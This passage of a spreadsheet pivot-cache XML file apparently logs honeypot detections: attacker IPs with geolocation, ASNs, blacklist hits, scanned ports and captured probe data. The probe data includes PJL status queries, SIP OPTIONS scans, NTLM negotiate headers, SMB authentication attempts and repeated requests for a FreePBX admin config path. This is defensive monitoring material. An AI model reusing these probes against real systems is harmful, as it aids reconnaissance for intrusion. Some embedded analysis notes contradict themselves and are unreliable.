-LAB_POP3_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_POSTGRES_H17&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_POP3_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;110&amp;&amp;143&amp;&amp;5432&amp;&amp;3306&amp;&amp;443&amp;&amp;NA&amp;&amp;3389&amp;&amp;9100&amp;&amp;25&amp;&amp;1433&amp;&amp;23&amp;&amp;80&amp;&amp;21&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;GET&amp;&amp;login&amp;&amp;request&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.250.150.39:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.253.43.207:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 149.102.153.168:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.118.77:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.253.43.207:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.166;rport=55477'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,34100)}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.115.66:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.54.115.66:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.118.29:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,43990)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.171.39:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.60.171.39:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,48070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (IGJuGnfq,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,49158)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (flwulmTj,)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.166,40584)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (VvlONUcC,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.166;rport=36326'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8da6"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="272"/>
    <x v="272"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:05:19"/>
    <d v="2023-07-25T17:09:08"/>
    <d v="2025-04-30T04:05:19"/>
    <n v="831"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;51884&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3589"/>
    <s v="127.115"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2003-04-17"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd9c:dd3b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="273"/>
    <x v="273"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:35:34"/>
    <d v="2024-04-16T11:42:08"/>
    <d v="2025-04-30T03:35:34"/>
    <n v="87"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;52469&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="29"/>
    <s v="Gwangju"/>
    <s v="Gwangsan-gu"/>
    <s v="Wolgye-dong"/>
    <s v="1833341"/>
    <s v="506302"/>
    <s v="35.2143"/>
    <s v="126.837"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2007-08-03"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7628:7a09"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="274"/>
    <x v="274"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:22:56"/>
    <d v="2023-08-11T21:08:00"/>
    <d v="2025-04-30T03:22:56"/>
    <n v="1544"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;30681&amp;&amp;1433&amp;&amp;445&amp;&amp;NA&amp;&amp;47506"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="الحوامدية"/>
    <s v="Al Ḩawāmidīyah"/>
    <s v="361179"/>
    <s v="NA"/>
    <s v="29.9012"/>
    <s v="31.2727"/>
    <s v="24835"/>
    <s v="Vodafone Data - Egypt"/>
    <s v="Vodafone Data"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,61843)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,53122)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,63109)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (196.221.164.144,61300)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4dd:a490"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="275"/>
    <x v="275"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:21:58"/>
    <d v="2025-04-30T03:21:58"/>
    <d v="2025-04-30T03:21:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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7:c376"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="276"/>
    <x v="276"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:11:09"/>
    <d v="2024-07-08T11:33:00"/>
    <d v="2025-04-30T03:11:09"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;45115&amp;&amp;23&amp;&amp;14793&amp;&amp;266&amp;&amp;6765&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Yongin-si"/>
    <s v="Yongin-si (Giheung-gu)"/>
    <s v="10914977"/>
    <s v="NA"/>
    <s v="37.2717"/>
    <s v="127.106"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc58:4b4a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious Telnet activity detected. _x000a_The lack of activity for this service does not indicate any malicious behavior. _x000a_This is an indicator of no unusual traffic on the monitored system. &amp;&amp; No log data provided, unable to analyze or describe malicious activity. &amp;&amp; No TELNET activity detected, indicating possible scanning or probing for vulnerable services. No malicious connections were established through this service. The absence of any TELNET traffic suggests the system is not currently under attack via this method."/>
    <s v="Port scan"/>
  </r>
  <r>
    <x v="277"/>
    <x v="277"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T03:11:03"/>
    <d v="2024-06-22T09:48:05"/>
    <d v="2025-04-30T03:11:03"/>
    <n v="810"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H5&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H10&amp;&amp;SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H32&amp;&amp;SMA-LAB_HTTPS_H6&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H22&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_HTTPS_H23&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_H30&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H12&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTPS_H13&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTPS_H20&amp;&amp;SMA-LAB_HTTPS_H43"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;445&amp;&amp;8443&amp;&amp;62848&amp;&amp;389&amp;&amp;445&amp;&amp;39913&amp;&amp;42234&amp;&amp;1854&amp;&amp;12154&amp;&amp;18862&amp;&amp;37634&amp;&amp;51768&amp;&amp;1260&amp;&amp;NA&amp;&amp;53176&amp;&amp;19349&amp;&amp;1464"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NV"/>
    <s v="Nevada"/>
    <s v="Clark"/>
    <s v="Las Vegas"/>
    <s v="5506956"/>
    <s v="89105"/>
    <s v="36.066"/>
    <s v="-115.139"/>
    <s v="36114"/>
    <s v="VegasNAP, LLC"/>
    <s v="VegasNAP, LLC"/>
    <s v="hosting"/>
    <s v="VegasNAP, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.113.33', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '91.194.11.82', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.181.21.224', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.63.23', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.97.67', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.118.77', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.79.122', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.8.69', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.146.12.172', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.180.55.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.4.48.242', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.116.162', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.138.110', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '77.91.74.218', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.40.123', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.8.76', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 